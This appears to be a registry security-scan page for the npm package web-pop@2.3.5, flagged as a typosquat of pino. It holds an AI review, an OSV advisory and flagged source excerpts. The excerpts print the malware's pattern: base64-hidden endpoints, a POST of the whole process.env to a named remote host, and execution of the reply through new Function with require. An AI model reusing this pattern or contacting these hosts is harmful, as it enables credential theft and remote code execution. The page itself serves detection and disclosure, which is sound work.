registry  /  web-pop  /  2.3.5

web-pop@2.3.5

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 4h ago · by lpm-firewall-ai

An inert remote-code payload is present in `lib/initializeCaller.js`. Directly loading that file would contact a hidden endpoint and execute its returned JavaScript, but no package entrypoint or lifecycle hook reaches it.

Static reason
One or more suspicious static signals were detected.
Trigger
A consumer or another payload explicitly requires `lib/initializeCaller.js`.
Impact
A server-controlled response could execute arbitrary code with the consuming process's `require` capabilities.
Mechanism
Obfuscated HTTP POST followed by remote JavaScript execution via `new Function`.
Rationale
Remote code execution logic is concrete, but it is not wired into installation or the declared runtime entrypoint. Treat as a suspicious staged payload carrier rather than an active install-time compromise.
Evidence
package.jsonlib/initializeCaller.jslib/const.jsfile.js
Network endpoints2
ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05dfpurple-kelila-79.tiiny.site/data.json

OSV Corroboration

OpenSSF/OSV
Advisory
MAL-2026-10575
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in web-pop (npm)
Details
web-pop is a typosquat of pino (copied description and keywords). On module load, lib/initializeCaller.js runs a top-level IIFE that reconstructs a hardcoded remote endpoint by base64-decoding strings disguised as `process.env.DEV_API_KEY`/`DEV_SECRET_KEY`/`DEV_SECRET_VALUE`, resolving to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df. The IIFE POSTs the entire process.env (spread as the request body) to that endpoint with an `x-secret-header` header, then passes the response body to `new Function('require', r.data)(require)`, executing attacker-controlled JavaScript with full Node privileges and access to require(). The result is both bulk exfiltration of environment variables (CI/dev tokens, cloud keys, npm/GitHub credentials, secrets) and arbitrary remote code execution on every machine that imports the package.

Decision evidence

public snapshot
AI called this Suspicious at 94.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `lib/initializeCaller.js` Base64-decodes a remote Vercel API URL.
  • It POSTs its local `process.env` object to that endpoint.
  • It executes the response with `new Function("require", response.data)`.
  • The file self-invokes on direct load and retries network execution.
  • `lib/const.js` contains a second Base64-obscured remote URL.
Evidence against
  • `package.json` has no preinstall, install, or postinstall hook.
  • No package source file imports or requires `lib/initializeCaller.js`.
  • No package source file imports or requires `lib/const.js`.
  • Declared `main` is missing, so normal package import fails before this payload can run.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 51.9 KB of source, external domains: github.com

Source & flagged code

4 flagged · loading source
lib/initializeCaller.jsView file
28.then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Eval

Package source references dynamic code evaluation.

lib/initializeCaller.jsView on unpkg · L28
13const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); L15: const apiHeaderValue = atob(process.env.DEV_SECRET_VALUE); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L13
2L3: const axios = require("axios"); L4: const process = { ... L12: (async function initializeCaller(..._args) { L13: const apiEndpoint = atob(process.env.DEV_API_KEY); L14: const apiHeaderKey = atob(process.env.DEV_SECRET_KEY); ... L22: L23: await axios.post( L24: apiEndpoint, ... L28: .then(response => { L29: const executor = new Function("require", response.data); L30: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

4 High3 Medium3 Low
HighChild Process
HighEvallib/initializeCaller.js
HighSame File Env Network Executionlib/initializeCaller.js
HighBase64 Obscured Urllib/initializeCaller.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings